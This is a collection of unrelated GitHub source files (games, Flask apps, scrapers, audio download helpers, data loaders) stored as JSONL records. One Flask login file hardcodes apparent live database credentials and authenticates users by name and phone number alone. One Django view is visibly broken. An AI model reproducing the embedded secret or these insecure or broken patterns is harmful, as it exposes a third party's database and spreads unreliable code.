10):\n print('LOST')\n game_over(10, 10)\n screen.set_event(6, None)\n\n\ndef main():\n screen.set_size(640, 640)\n screen.set_event(6, on_mouse_down)\n create_blocks(10, 10)\n\n while not screen.closed:\n screen.run()\n # on_mouse_down()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"xuelians/pyscratch","sub_path":"mine2.py","file_name":"mine2.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14091292258","text":"from pn.ws import settings\nfrom pn.web import http\nfrom pn.web import responsecode\n\nHTML_TEMPLATE = \"\"\"\n<html>\n<head>\n<title>%(title)s\n\n\n\n
\n%(body)s\n\n\n\"\"\"\n\ndef _url(photo, v):\n\tif v == 'original':\n\t\tv = photo.secret\n\t#return 'http://%s.%s:%s/%s/%s/%s/' % (settings.inner_host, settings.server_domain, settings.listen_port, photo.username, photo.filename, v)\n\treturn 'http://%s.%s/%s/%s/%s' % (settings.inner_host, settings.server_domain, photo.username, photo.filename, v)\n\n\ndef sizeListPage(photo):\n\tbody = '
    %s
' % ''.join(['
  • %s
  • ' % (_url(photo, v), v) for v in ('square', 'thumb', 'small', 'medium', 'big', 'large', 'original')])\n\treturn HTML_TEMPLATE % {\n 'title': '365 Photo Versions',\n 'body': body\n } \n\t#return http.Response(responsecode.FORBIDDEN)","repo_name":"oscar810429/pndfs","sub_path":"pn/ws/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"23999597907","text":"from datetime import datetime, timedelta\nfrom flask import Flask, request, make_response, session, flash,jsonify,render_template\nfrom flask_mysqldb import MySQL\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nimport MySQLdb.cursors\nimport os\nimport jwt\n\napp = Flask(__name__)\n\napp.secret_key = os.urandom(24)\napp.config['SESSION_TYPE'] = os.urandom(24)\napp.config['MYSQL_HOST'] = 'api12192001.mysql.database.azure.com'\napp.config['MYSQL_USER'] = 'Asuna1219@api12192001'\napp.config['MYSQL_PASSWORD'] = 'Asuna2001'\napp.config['MYSQL_DB'] = 'user'\napp.config['UPLOAD_FOLDER'] = 'static/Uploads'\n\nmysql = MySQL(app)\n\n@app.route('/')\ndef index():\n\treturn render_template('C:/Users/KIIT/Desktop/API/templates/login.html')\n\n@app.route('/login', methods =['GET', 'POST'])\ndef login():\n\tmsg = ''\n\tif request.method == 'POST' and 'username' in request.form and 'phonenumber' in request.form:\n\t\tusername = request.form['username']\n\t\tnumber = request.form['phonenumber']\n\t\tcursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n\t\tcursor.execute('SELECT * FROM user WHERE name = %s AND phonenumber = %s', (username, number,))\n\t\taccount = cursor.fetchone()\n\t\tif account: #wher user_id = token, \n\t\t\tsession['logged_in'] = True\n\t\t\tsession['name'] = account['name']\n\t\t\tsession['number'] = account['phonenumber']\n\t\t\tmsg = 'Logged in successfully !'\n\t\t\treturn render_template('userHome.html', msg = msg)\n\t\telse:\n\t\t\tmsg = 'Incorrect Name / PhoneNumber!'\n\t\t\treturn render_template('login.html', msg = msg)\n\telse:\n\t\treturn render_template('login.html')\n\n\nif __name__ == '__main__':\n\tapp.run(debug=True)\n","repo_name":"Sonichigo/API","sub_path":"API/Auth/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5368455997","text":"\"\"\"\nModule initialization_handler.py from the package PyZEAL.\nThis module handles initialization for the default PyZEAL services.\n\nAuthors:\\n\n- Philipp Schuette\\n\n\"\"\"\n\nfrom typing import Optional\n\nfrom pyzeal.algorithms.estimators.argument_estimator import ArgumentEstimator\nfrom pyzeal.algorithms.finder_algorithm import FinderAlgorithm\nfrom pyzeal.cli.cli_controller import CLIController\nfrom pyzeal.cli.cli_parser import PyZEALParser\nfrom pyzeal.cli.controller_facade import CLIControllerFacade\nfrom pyzeal.cli.parser_facade import PyZEALParserInterface\nfrom pyzeal.plugins.plugin_loader import PluginLoader\nfrom pyzeal.pyzeal_logging.log_manager import LogManager\nfrom pyzeal.pyzeal_logging.logger_facade import PyZEALLogger\nfrom pyzeal.pyzeal_types.init_modes import InitModes\nfrom pyzeal.settings.settings_service import SettingsService\nfrom pyzeal.utils.containers.root_container import RootContainer\nfrom pyzeal.utils.factories.algorithm_factory import AlgorithmFactory\nfrom pyzeal.utils.factories.container_factory import ContainerFactory\nfrom pyzeal.utils.factories.estimator_factory import EstimatorFactory\nfrom pyzeal.utils.factories.settings_factory import SettingsServiceFactory\nfrom pyzeal.utils.install_test_facade import InstallTestingHandlerFacade\nfrom pyzeal.utils.install_test_handler import InstallTestingHandler\nfrom pyzeal.utils.service_locator import ServiceLocator\n\n\nclass PyZEALInitializationHandler:\n \"Static initialization handler for PyZEAL services.\"\n\n # the module level logger\n _logger: Optional[PyZEALLogger] = None\n\n # protect from multiple initializations\n initialized = False\n\n @staticmethod\n def initPyZEALServices(mode: InitModes = InitModes.SCRIPT) -> None:\n \"\"\"\n Register all relevant services with the ServiceLocator and initialize\n the available plugins.\n \"\"\"\n # check for re-initialization\n if PyZEALInitializationHandler.initialized:\n if PyZEALInitializationHandler._logger is None:\n return\n PyZEALInitializationHandler._logger.warning(\n \"re-initialization attempt with mode %s detected - skipped!\",\n mode.name if mode.name else \"[unknown]\",\n )\n return\n\n # register settings service first so we can initialize logging\n if mode in (InitModes.CLI | InitModes.SCRIPT):\n ServiceLocator.registerAsTransient(\n SettingsService, SettingsServiceFactory.getConcreteSettings\n )\n PyZEALInitializationHandler._logger = LogManager.initLogger(\n __name__.rsplit(\".\", maxsplit=1)[-1],\n ServiceLocator.tryResolve(SettingsService).logLevel,\n )\n\n if mode in InitModes.SCRIPT:\n PyZEALInitializationHandler._logger.info(\n \"initializing algorithms...\"\n )\n ServiceLocator.registerAsTransient(\n FinderAlgorithm, AlgorithmFactory.getConcreteAlgorithm\n )\n PyZEALInitializationHandler._logger.info(\n \"initializing containers...\"\n )\n ServiceLocator.registerAsTransient(\n RootContainer, ContainerFactory.getConcreteContainer\n )\n PyZEALInitializationHandler._logger.info(\n \"initializing estimators...\"\n )\n ServiceLocator.registerAsTransient(\n ArgumentEstimator, EstimatorFactory.getConcreteEstimator\n )\n if mode in InitModes.CLI:\n PyZEALInitializationHandler._logger.info(\"initializing cli...\")\n ServiceLocator.registerAsSingleton(\n PyZEALParserInterface, PyZEALParser()\n )\n ServiceLocator.registerAsTransient(\n CLIControllerFacade, CLIController\n )\n ServiceLocator.registerAsTransient(\n InstallTestingHandlerFacade, InstallTestingHandler\n )\n\n # plugins cannot be loaded in cli mode (plugins might be broken, ...)!\n if mode not in InitModes.CLI:\n PyZEALInitializationHandler._logger.info(\"loading plugins...\")\n PluginLoader.loadPlugins()\n\n # initialization complete!\n PyZEALInitializationHandler.initialized = True\n PyZEALInitializationHandler._logger.info(\"initialization complete!\")\n","repo_name":"Spectral-Analysis-UPB/PyZEAL","sub_path":"pyzeal/utils/initialization_handler.py","file_name":"initialization_handler.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"23435703802","text":"from bs4 import BeautifulSoup\nfrom django.core.management.base import BaseCommand\nfrom selenium import webdriver\n\nfrom main.models import Expert\n\nURL_FORMAT = \"https://experts.nti.work/e-registry?page={}\"\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n Expert.objects.all().delete()\n driver = webdriver.Chrome(\"chromedriver.exe\")\n page = 1\n while True:\n driver.get(URL_FORMAT.format(page))\n if page == 1:\n input()\n page += 1\n\n experts = BeautifulSoup(driver.page_source).find_all(\"div\", class_=\"expert-profile-card plate\")\n\n if not experts:\n break\n\n for expert in experts:\n data = expert.find_all(\"div\", class_=\"expert-profile-card__block\")\n link = expert.find(\"a\", class_=\"button button--primary global-profile__sidebar-btn-w-100\")[\"href\"]\n Expert.objects.get_or_create(\n id=link.split(\"/\")[4],\n name=data[0].text,\n text=data[1].text[6:],\n help=data[2].text[24:],\n expertise=data[3].text[10:],\n competencies=data[4].text[11:],\n link=link\n )\n","repo_name":"BossOfCreeps/a2022_expert_parser","sub_path":"main/management/commands/experts.py","file_name":"experts.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15462495385","text":"# -*- coding: utf-8 -*-\n\"\"\"\n解く前のメモ\n\nNが10**5まであるので、とても全部をforで回すのは無理だよねという話\nAとBが決まればCは二部探索で・・・みたいなことも厳しい\n選び方の総数というのがポイントな気がする\n\n以下解説を見て分かった回答方法\n46の倍数になる組み合わせというのがポイント\n46の倍数になるということは各配列を46で割ったあまりを求める\nとすれば、0の数,1の数...45の数と求められる\nあとは足して46となるように全ての組み合わせを全探索すれば良いだけ\n\"\"\"\n\nN = int(input())\nA = list(map(int, input().split()))\nB = list(map(int, input().split()))\nC = list(map(int, input().split()))\n\nad = list(map(lambda n: n % 46, A))\nbd = list(map(lambda n: n % 46, B))\ncd = list(map(lambda n: n % 46, C))\n\na_counts = [ad.count(n) for n in range(46)]\nb_counts = [bd.count(n) for n in range(46)]\nc_counts = [cd.count(n) for n in range(46)]\n\nans = 0\nfor a in range(46):\n for b in range(46):\n for c in range(46):\n if (a+b+c) % 46 == 0:\n a_cnt = a_counts[a]\n b_cnt = b_counts[b]\n c_cnt = c_counts[c]\n ans += a_cnt * b_cnt * c_cnt\nprint(ans)\n","repo_name":"bun913/atcoder_python","sub_path":"typical90/046/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"39975741846","text":"from sys import exit\nimport pygame\nfrom pygame.locals import *\npygame.init()\n\n\nflags = pygame.DOUBLEBUF | pygame.SCALED | pygame.FULLSCREEN\nscreen = pygame.display.set_mode((640, 480),flags)\n\ndef cropImg(img,rect):\n cropped = pygame.Surface((rect.width, rect.height),flags=pygame.SRCALPHA).convert_alpha()\n cropped.blit(img,(-rect.x,-rect.y))\n return cropped\n\nimg_x = 10\nimg_y = 10\nimg_width = 200\nimg_height = 200\npath = \"../Assets/image/character/asval/attack/asval_attack_0.png\"\n\ncharacterImage1 = pygame.image.load(path)\ncharacterImage1_array = pygame.surfarray.array3d(cropImg(characterImage1,characterImage1.get_bounding_rect()))\n\n\ndarker = 1\nfor pixel_line in characterImage1_array:\n for pixel_rgb in pixel_line:\n for i in range(3):\n pixel_rgb[i] -= darker\n if pixel_rgb[i] < 0:\n pixel_rgb[i] = 0\n darker += 1\n\ncharacterImage1 = pygame.surfarray.make_surface(characterImage1_array)\n\nwhile True:\n screen.fill((255,255,255))\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n exit()\n \n screen.blit(characterImage1,(0,0))\n pygame.display.flip()\n","repo_name":"TigeiaWorkshop/GFL-LastWish-Archive","sub_path":"Test/array2dTest.py","file_name":"array2dTest.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34962106490","text":"#! /usr/bin/env python\n\"\"\"\nfizz buzz exersize\n\"\"\"\n\ndef fizzbuzz(n):\n for num in range(1, n+1):\n if num % 3 == 0 and num % 5 == 0:\n print(\"fizzbuzz\")\n elif num % 3 == 0:\n print(\"fizz\")\n elif num % 5 == 0:\n print(\"buzz\")\n else:\n print(num)\n return(num)\n\nif __name__ == \"__main__\":\n# __name__ is calld \"dundername\"\n fizzbuzz(15)\n fizzbuzz(100)\n","repo_name":"UWPCE-PythonCert/IntroPython-2017","sub_path":"students/kate/session02/fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"71167912512","text":"\"\"\"\nSoundScrape functions\n\"\"\"\nimport os\n\nfrom clint.textui import colored, puts, progress\nfrom os.path import dirname, exists, join\nfrom urllib import parse\n\nfrom soundscrape.soundscrape import download_file, download_track, download_tracks, \\\n get_client, get_hard_track_url, get_soundcloud_api_playlist_data, \\\n get_soundcloud_api2_data, get_soundcloud_data, \\\n puts_safe, sanitize_filename, tag_file\n\n\ndef process_soundcloud(vargs):\n \"\"\"\n Subset of SoundScrape process_soundcloud call.\n Not ideal, but need the filename(s).\n \"\"\"\n\n artist_url = vargs['artist_url']\n num_tracks = vargs['num_tracks']\n\n # Restricting SoundScrape usage\n keep_previews = False\n folders = False\n downloadable = False\n\n id3_extras = {}\n one_track = False\n likes = False\n client = get_client()\n\n if 'soundcloud' not in artist_url.lower():\n puts(colored.red(\"Could not find soundcloud in the URL\"))\n return None\n\n try:\n resolved = client.get('/resolve', url=artist_url, limit=200)\n except Exception as e: # HTTPError?\n\n # SoundScrape is trying to prevent us from downloading this.\n # We're going to have to stop trusting the API/client and\n # do all our own scraping. Boo.\n\n if '404 Client Error' in str(e):\n puts(colored.red(\"Problem downloading [404]: \") + colored.white(\"Item Not Found\"))\n return None\n\n message = str(e)\n item_id = message.rsplit('/', 1)[-1].split('.json')[0].split('?client_id')[0]\n hard_track_url = get_hard_track_url(item_id)\n\n track_data = get_soundcloud_data(artist_url)\n puts_safe(colored.green(\"Scraping\") + colored.white(\": \" + track_data['title']))\n\n filenames = []\n filename = sanitize_filename(track_data['artist'] + ' - ' + track_data['title'] + '.mp3')\n\n if exists(filename):\n puts_safe(colored.yellow(\"Track already downloaded: \") + colored.white(track_data['title']))\n return None\n\n filename = download_file(hard_track_url, filename)\n tagged = tag_file(filename,\n artist=track_data['artist'],\n title=track_data['title'],\n year='2017',\n genre='',\n album='',\n artwork_url='')\n\n if not tagged:\n wav_filename = filename[:-3] + 'wav'\n os.rename(filename, wav_filename)\n filename = wav_filename\n\n filenames.append(filename)\n\n else:\n aggressive = False\n\n # This is is likely a 'likes' page.\n if not hasattr(resolved, 'kind'):\n tracks = resolved\n else:\n if resolved.kind == 'artist':\n artist = resolved\n artist_id = str(artist.id)\n tracks = client.get('/users/' + artist_id + '/tracks', limit=200)\n elif resolved.kind == 'playlist':\n id3_extras['album'] = resolved.title\n if resolved.tracks != []:\n tracks = resolved.tracks\n else:\n tracks = get_soundcloud_api_playlist_data(resolved.id)['tracks']\n tracks = tracks[:num_tracks]\n aggressive = True\n for track in tracks:\n download_track(track, resolved.title, keep_previews, folders, custom_path=vargs['path'])\n\n elif resolved.kind == 'track':\n tracks = [resolved]\n elif resolved.kind == 'group':\n group = resolved\n group_id = str(group.id)\n tracks = client.get('/groups/' + group_id + '/tracks', limit=200)\n else:\n artist = resolved\n artist_id = str(artist.id)\n tracks = client.get('/users/' + artist_id + '/tracks', limit=200)\n if tracks == [] and artist.track_count > 0:\n aggressive = True\n filenames = []\n\n data = get_soundcloud_api2_data(artist_id)\n\n for track in data['collection']:\n\n if len(filenames) >= num_tracks:\n break\n\n if track['type'] == 'playlist':\n track['playlist']['tracks'] = track['playlist']['tracks'][:num_tracks]\n for playlist_track in track['playlist']['tracks']:\n album_name = track['playlist']['title']\n filename = download_track(playlist_track, album_name, keep_previews, folders, filenames, custom_path=vargs['path'])\n if filename:\n filenames.append(filename)\n else:\n d_track = track['track']\n filename = download_track(d_track, custom_path=vargs['path'])\n if filename:\n filenames.append(filename)\n\n if not aggressive:\n filenames = download_tracks(client, tracks, num_tracks, downloadable, folders, vargs['path'],\n id3_extras=id3_extras)\n\n return filenames\n","repo_name":"cthib/song-genre-classifier","sub_path":"soundcloud_extraction.py","file_name":"soundcloud_extraction.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"60"} +{"seq_id":"45684871510","text":"from flask import Flask, render_template, redirect\nfrom forms.LoginForm import LoginForm\nfrom forms.RegisterForm import RegisterForm\nfrom flask_login import LoginManager\nfrom data import db_session\nfrom data.users import User\n\ndb_session.global_init('db/users.db')\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'Audio_editor_secret_key'\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n\n@app.route('/')\ndef main():\n return render_template('start.html')\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n db_sess = db_session.create_session()\n return db_sess.query(User).get(user_id)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n return redirect('/success')\n return render_template('login.html', title='Авторизация', form=form)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegisterForm()\n if form.validate_on_submit():\n if form.password.data != form.password_again.data:\n return render_template('register.html', title='Регистрация',\n form=form,\n message=\"Пароли не совпадают\")\n db_sess = db_session.create_session()\n if db_sess.query(User).filter(User.email == form.email.data).first():\n return render_template('register.html', title='Регистрация',\n form=form,\n message=\"Такой пользователь уже есть\")\n user = User(\n name=form.name.data,\n email=form.email.data,\n )\n user.set_password(form.password.data)\n db_sess.add(user)\n db_sess.commit()\n return redirect('/login')\n return render_template('register.html', title='Регистрация', form=form)\n\n\n@app.route('/profile')\ndef profile():\n return render_template('profile.html')\n\n\n@app.route('/success')\ndef success():\n return render_template('base.html')\n\n\nif __name__ == \"__main__\":\n app.run(host='127.0.0.1', port=8080)\n","repo_name":"kostikgrach/Audio_editor_online","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74067120511","text":"import multiprocessing\nimport os\nimport cv2\nfrom tqdm import tqdm\n\n\ndef extract_label_per_img(df, img_name):\n format_data = []\n img_df = df[df['file_name']==img_name]\n label = img_df.loc[:, 'point1_x':'point4_y']\n label['class_num'] = img_df['class_id']\n return label.values\n\ndef clip_image(file_idx, image, width, height, stride_w, stride_h,cropped_img_savepath,padding_size=0,value=0):\n shape = image.shape\n # padding_size 는 전체 이미지에 대한 비율 ex) 1/6 ,1/7, 1/8\n if padding_size > 0:\n padding_size = shape*padding_size\n image = cv2.copyMakeBorder(image, padding_size, padding_size, padding_size, padding_size, cv2.BORDER_CONSTANT,value)\n # cropping 할 때 padding을 넣는게 좋을 까? 라는 생각을 함.(자르기 전에 초기에 넣자).\n\n for start_h in range(0, shape[0], stride_h):\n for start_w in range(0, shape[1], stride_w):\n\n start_h_new = start_h\n start_w_new = start_w\n if start_h + height > shape[0]:\n start_h_new = shape[0] - height\n if start_w + width > shape[1]:\n start_w_new = shape[1] - width\n top_left_row = max(start_h_new, 0)\n top_left_col = max(start_w_new, 0)\n bottom_right_row = min(start_h + height, shape[0])\n bottom_right_col = min(start_w + width, shape[1])\n\n subImage = image[top_left_row:bottom_right_row, top_left_col: bottom_right_col]\n\n\n if (subImage.shape[0] > 5 and subImage.shape[1] > 5):\n crop_img_name = \"%s_%04d_%04d_%04d.png\" % (file_idx, top_left_row, top_left_col,width)\n crop_img_path = os.path.join(cropped_img_savepath,crop_img_name)\n cv2.imwrite(crop_img_path, subImage)\n\n\ndef cropImg_makeLabel_Save_multiproc(crop_size):\n padding_size = 0\n save_folder = os.path.join(test_folder, str(crop_size) + '_cropped_images/')\n img_h, img_w = crop_size, crop_size\n stride_h = int(crop_size*4/5)\n stride_w = int(crop_size*4/5)\n os.makedirs(save_folder, exist_ok=True)\n images = [i for i in os.listdir(IMAGE_PATH1) if 'png' in i]\n for idx, img in enumerate(images):\n print('shape {0} cropping rate : {1}'.format(img_w,idx/len(images)))\n img_data = cv2.imread(os.path.join(IMAGE_PATH1, img))\n clip_image(img.strip('.png'), img_data, img_w, img_h, stride_w, stride_h,save_folder,padding_size) # crop & gt refine & saving\n\n print('-*--*--*--*-shape {0} cropping DONE-*--*--*--*-'.format(img_w))\n\n\ntest_folder = os.path.expanduser('~/ADD_dataset/test') # 테스트 이미지들의 위치\nIMAGE_PATH1 = os.path.expanduser('~/ADD_dataset/test/images') # 테스트 이미지를 저장할\n\nif __name__ == \"__main__\":\n\n # for multi processing\n cropping_size_list = [550,750,1050,1250,1550]\n\n pool = multiprocessing.Pool(processes=5) # io 이슈 때문에 5개가 한계이다...\n pool.map(cropImg_makeLabel_Save_multiproc,cropping_size_list)\n pool.close()\n pool.join()\n print('processing done')\n\n\n\n\n\n\n","repo_name":"Genie-Kim/detectron2_ADDchallenge","sub_path":"module_jinkim/test_data_cropping.py","file_name":"test_data_cropping.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13406627634","text":"from django.conf import settings\nfrom django.test import TestCase\n\nfrom contuga.contrib.categories.models import Category\nfrom contuga.mixins import TestMixin\n\n\nclass CategorySignalsTests(TestCase, TestMixin):\n def test_signals(self):\n old_categories_count = Category.objects.count()\n user = self.create_user()\n new_categories_count = Category.objects.count()\n default_categories_len = len(settings.DEFAULT_CATEGORIES)\n\n # Assert default categories are created\n self.assertEqual(\n new_categories_count, old_categories_count + default_categories_len\n )\n\n new_categories = Category.objects.order_by(\"-pk\")[:default_categories_len]\n\n # Assert settings instance belongs to the correct user\n for category in new_categories:\n with self.subTest(category=category.name):\n self.assertEqual(category.author, user)\n","repo_name":"contuga/contuga-web","sub_path":"contuga/contrib/categories/tests/test_signals.py","file_name":"test_signals.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71572456160","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom .models import Canales\nfrom mutagen.mp3 import MP3\nfrom .forms import RangoFrecuenciasForm\n\n\n\ndef post_list(request):\n return render(request, 'blog/post_list.html', {})\n\ndef home_view(request):\n \n return render(request, \"vista.html\")\n\n#PASO 1: ESTABLECER RANGO DE FRECUENCIA \ndef establecer_rango(request):\n if request.method == 'POST':\n form = RangoFrecuenciasForm(request.POST)\n if form.is_valid():\n frecuencia_inicial = form.cleaned_data['frecuencia_inicial']\n frecuencia_final = form.cleaned_data['frecuencia_final']\n form.save()\n return redirect('ver-rangos')\n else:\n form = RangoFrecuenciasForm()\n \n return render(request, 'vista.html', {'form': form})\n\ndef ver_rangos(request):\n rangos = RangoFrecuencias.objects.all()\n return render(request, 'index.html', {'rangos': rangos})\n\n#SUBIR ARCHIVO MP3\ndef subir_mp3(request):\n if request.method == 'POST':\n form = SubirMP3Form(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n archivo = form.cleaned_data['archivo_mp3']\n # Aquí puedes hacer lo que quieras con el archivo, como guardarlo en el servidor o en la base de datos\n return render(request, 'subir_mp3.html', {'form': form, 'mensaje': 'Archivo subido exitosamente'})\n else:\n form = UploadMP3Form()\n return render(request, 'subir_mp3.html', {'form': form})\n\ndef anchoDeBandaMp3():\n archivo_mp3 = Archivos.objects.last() #ultimo archivo subido\n info_mp3 = MP3(archivo_mp3)\n tasa_bits_audio = info_mp3.info.bitrate\n numero_simbolos_por_segundo = 1000\n ancho_banda_necesario = tasa_bits_audio / numero_simbolos_por_segundo\n print(f\"Ancho de Banda Necesario: {ancho_banda_necesario:.2f} Hz\")\n return ancho_banda_necesario\n\ndef calcular_snr_min(capacidad, ancho_de_banda_minimo):\n snr_min = capacidad / bandwidth\n return snr_min\n\n\n\n#PASO 2: CORRER DETECTOR EN UN HILO PARA QUE ALMACENE DATA DE LOS CANALES DISPONIBLES EN LA BASE DE DATOS\ndef bloqueCognitivo(request):\n canales = Canales.objects.all()\n canal_seleccionado = none \n mejor_puntuacion = float('-inf')\n ancho_de_banda_minimo = anchoDeBandaMp3()\n capacidad = 1000\n potencia_maxima = -70\n snr_min = calcular_snr_min(capacidad, ancho_de_banda_minimo)\n print(f\"SNR mínimo requerido: {snr_min:.2f} dB\")\n #PASO 3: OBTENER VALORES DESDE EL MODELO DE CANALES P\n for canal in canales:\n frecuencia = canal.frecuencia\n ancho_banda_suficiente = canal.bandwith >= ancho_de_banda_minimo\n snr_aceptable = canal.snr >= snr_minimo\n potencia_baja = canal.potencia <= potencia_maxima\n puntuacion = ancho_banda_suficiente + snr_aceptable + (1 / potencia_baja)\n\n if puntuacion > mejor_puntuacion:\n mejor_puntuacion = puntuacion\n mejor_espacio = canal\n\n return mejor_espacio\n\n\n# Definir los valores mínimos para cada parámetro\n#ancho_banda_minimo_mp3 = 128 # kbps\n#snr_minimo = 10 # dB\n # dBm\n\n#PASO 4: CORRER BLOQUE COGNITIVO CON LA INFORMACION DE LOS CANALES Y ELEGIR EL MAS OPTIMO\n","repo_name":"nicoler229/radiocognitiva-master","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23632256520","text":"import turtle\nfrom turtle import *\nimport random,time\n\nspeed(0)\npenup()\ngoto(-180,140)\nw=turtle.Screen()\nw.title(\"Turtle Race\")\ntime.sleep(5)\nfor i in range(21):\n write(i, align=\"center\")\n right(90)\n forward(10)\n pendown()\n forward(180)\n penup()\n backward(190)\n left(90)\n forward(20)\n \nrT=Turtle()\nrT.color(\"red\")\nrT.shape(\"turtle\")\nrT.penup()\nrT.goto(-180,100)\nbT=Turtle()\nbT.color(\"Blue\")\nbT.shape(\"turtle\")\nbT.penup()\nbT.goto(-180,60)\ngT=Turtle()\ngT.color(\"green\")\ngT.shape(\"turtle\")\ngT.penup()\ngT.goto(-180,20)\nyT=Turtle()\nyT.color(\"purple\")\nyT.shape(\"turtle\")\nyT.penup()\nyT.goto(-180,-20)\nrT.pendown()\nbT.pendown()\ngT.pendown()\nyT.pendown()\na=[1,2,3,4,5]\ndef p(x,y):\n rT.goto(-180,100)\n bT.goto(-180,60)\n gT.goto(-180,20)\n yT.goto(-180,-20)\n for i in range (132):\n \n '''rT.forward(random.randint(1,5))\n bT.forward(random.randint(1,5))\n gT.forward(random.randint(1,5))\n yT.forward(random.randint(1,5))'''\n rT.penup()\n bT.penup()\n gT.penup()\n yT.penup()\n rT.forward(random.choice(a))\n bT.forward(random.choice(a))\n gT.forward(random.choice(a))\n yT.forward(random.choice(a))\n r=rT.xcor()\n b=bT.xcor()\n g=gT.xcor()\n y=yT.xcor()\n s=[]\n s.append(r)\n s.append(b)\n s.append(g)\n s.append(y)\n s.sort(reverse=True)\n k=[\"FIRST\",\"SECOND\",\"THIRD\",\"FORTH\"]\n print(s)\n for i in range(4):\n if s[i]==r:\n m=\" RED TURTLE\"\n elif s[i]==b:\n m=\" BLUE TURTLE\"\n elif s[i]==g:\n m=\" GREEN TURTLE\"\n elif s[i]==y:\n m=\" PURPLE TURTLE\"\n print(\"{}:{}\".format(k[i],m))\nw.onclick(p)\n","repo_name":"werfree/Python","sub_path":"TurtleRace.py","file_name":"TurtleRace.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25398752619","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# @file loaders.py\n# @author Albert Puig (albert.puig@cern.ch)\n# @date 13.04.2017\n# =============================================================================\n\"\"\"Data loaders.\"\"\"\nfrom __future__ import print_function, division, absolute_import\n\nimport os\nimport random\nimport string\n\nimport ROOT\n\nimport numpy as np\nimport pandas as pd\nfrom root_pandas import read_root\nimport formulate\n\nfrom analysis.data.converters import dataset_from_pandas\nfrom analysis.utils.logging_color import get_logger\nfrom analysis.utils.root import destruct_object, list_to_rooarglist\n\n\nlogger = get_logger('analysis.data.loaders')\n\n\n###############################################################################\n# Helpers\n###############################################################################\ndef _analyze_weight_config(config):\n \"\"\"Analyze weight config.\n\n Arguments:\n config (dict): `get_data` configuration.\n\n Return:\n tuple (str, list, list): Name of the total weight variable, weight variables to\n normalize, weight variables not to normalize.\n\n Raise:\n KeyError: If there is some error in the configuration.\n ValueError: If there are common weights between to-normalize and not-to-normalize\n or if the name of the total weight variable corresponds to one of the weights.\n\n \"\"\"\n # Check weights\n weights_to_normalize = config.get('weights-to-normalize', [])\n weights_not_to_normalize = config.get('weights-not-to-normalize', [])\n if set(weights_to_normalize) & set(weights_not_to_normalize):\n logger.error(\"Common weights between 'weights-to-normalize' and 'weights-not-to-normalize'\")\n raise ValueError\n if not isinstance(weights_to_normalize, (list, tuple)):\n weights_to_normalize = [weights_to_normalize]\n if not isinstance(weights_not_to_normalize, (list, tuple)):\n weights_not_to_normalize = [weights_not_to_normalize]\n weights = weights_to_normalize + weights_not_to_normalize\n if weights:\n # If `weight-var-name` is specified, create a total weight variable with this name,\n # otherwise create a total weight variable `totalWeight`\n weight_var = config.get('weight-var-name', 'totalWeight')\n # If `weight_var-name` corresponds to a weight, raise an error\n if set(weights_to_normalize + weights_not_to_normalize).intersection([weight_var]):\n logger.error(\"'weight-var-name' is already used as weight\")\n raise ValueError\n else:\n weight_var = None\n return weight_var, weights_to_normalize, weights_not_to_normalize\n\n\ndef _get_root_from_dataframe(frame, kwargs):\n \"\"\"Properly load a pandas DataFrame into a `ROOT.RooDataSet`.\n\n Needed keys in `kwargs` are:\n + `name`: Name of the `RooDataSet`.\n + `title`: Title of the `RooDataSet`.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `weights-to-normalize`: Variables defining the weights that are normalized\n to the total number of entries of the dataset.\n + `weights-not-to-normalize`: Variables defining the weights that are not normalized.\n + `weight-var-name`: Name of the weight variable. If there is only one weight,\n it 